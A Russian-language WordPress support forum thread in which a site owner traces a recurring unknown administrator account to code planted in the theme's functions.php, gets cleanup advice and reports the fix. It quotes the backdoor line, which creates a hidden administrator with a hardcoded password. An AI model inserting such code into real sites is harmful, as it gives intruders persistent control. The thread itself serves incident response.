Поддержка Проблемы и решения Неизвестный пользователь с ролью админа

  • Здравствуйте. В админке есть второй пользователь с ролью администратора. Имя wordcamp, эл.почта wordcamp@wordpress.com. Пробовал удалить много раз, но он появляется снова, меняется только ID, увеличивается на 1.
    Что это за пользователь? Системный?
    Был плагин Wordfence Security. Удалил его, думал это плагин создает пользователя, нет.
    Из-под phpmyadmin тоже пробовал удалить, снова появляется

Просмотр 11 ответов — с 1 по 11 (всего 11)
  • Модератор Yui

    (@fierevere)

    ゆい

    в WordPress нет «системных» пользователей.
    Вполне возможно что на сайте поселился зловредный код, который открывает кому-то бэкдор.

    https://ru.wordpress.org/support/article/faq-hacked/

    Спасибо.
    Вот нашёл, где создается пользователь, в файле темы functions.php:
    $createuser = wp_create_user(‘wordcamp’, ‘218765z’, ‘wordcamp@wordpress.com’); $user_created = new WP_User($createuser); $user_created -> set_role(‘administrator’);

    Получается в теме дыра? С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    • Ответ изменён 1 месяц, 1 неделя назад пользователем andreynec.
    Модератор Yui

    (@fierevere)

    ゆい

    Получается в теме дыра?

    именно так.

    virus ‘{HEX}php.gzbase64.inject.455

    если это ваш антивирус ругается на айболита, то если айболит с официального сайта скачан, то срабатывание ложное

    Антивирус молчит. Это происходит в FileZilla, загрузка и моментальное удаление файла. Айболит скачал из статьи по ссылке: https://revisium.com/ai/.
    Virustotal и другие показывают, что чисто. Залил заново папки wp-admin, wp-includes.
    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов и другими настройками безопасности. Надеюсь, поможет защитить.

    • Ответ изменён 1 месяц, 1 неделя назад пользователем andreynec.

    andreynec, приветствую.

    Получается в теме дыра?

    Да, но тут всё зависит от деталей. Либо сама тема была уже такой, либо кто-то модифицировал файл. Смотрите даты, если есть бэкапы, то сравнивайте код оригинала и версии на вашем сервере.

    С айболитом пока не справился, почему-то в корневой каталог не загружается, вернее загружается и сразу удаляется, ai-bolit-hoster.php
    Пишет вот так:
    550 Transfer aborted: virus ‘{HEX}php.gzbase64.inject.455.UNOFFICIAL’ detected

    Это происходит в FileZilla, загрузка и моментальное удаление файла.

    Это происходит на сервере, а FileZilla лишь интерпретирует ответ в виде ошибки. Немного глупая ситуация, да и «Ай-Болит» вам не поможет по ряду причин. Основная — он в принципе не реагирует на штатные функции создания пользователей в системе и пр., не говоря уже о том, что и малвари находит в лучшем случае треть от общего количества.

    Virustotal и другие показывают, что чисто.

    Потому что у них нет доступа к файлам, то есть метод тоже бесполезный. Сканируется только исходный код указанной страницы.

    Залил заново папки wp-admin, wp-includes.

    Хорошо, но бесполезно, если не вычистили лишний код из /wp-content/.

    Поставил плагин All In One WP Security & Firewall, с контролем изменения файлов

    Он довольно легко обходится 🙂

    По фактам :). Спасибо. Буду вручную чистить wp-content.

    andreynec, ну как, получилось? 🙂

    Да, вроде, пока тихо. Нашёл сторонний код только в двух файлах темы: functions.php и включаемом в него template-functions.php.
    Сменил пароли, имя админа wp, путь site.ru/wp-admin с помощью All In One WP Security & Firewall, остальные настройки в нём выставил. Пока работает.

    @andreynec, а как все-таки удалить этого пользователя?
    Вроде в functions.php и template-functions.php код почистила, но редиректы и дальше срабатывают.

    • Ответ изменён 1 месяц назад пользователем alenkarolik.
    Модератор Yui

    (@fierevere)

    ゆい

    @subversa , решение проблем только на форуме. Просьбы написать куда-то можно только в разделе «Специалисты».

    @alenkarolik, у меня в папке с темами ещё была одна левая тема и тема twenty, их обе удалил. После уже чистил файлы моей темы. После очистки пользователя удалил из консоли wordpress. Больше он не появлялся.

Просмотр 11 ответов — с 1 по 11 (всего 11)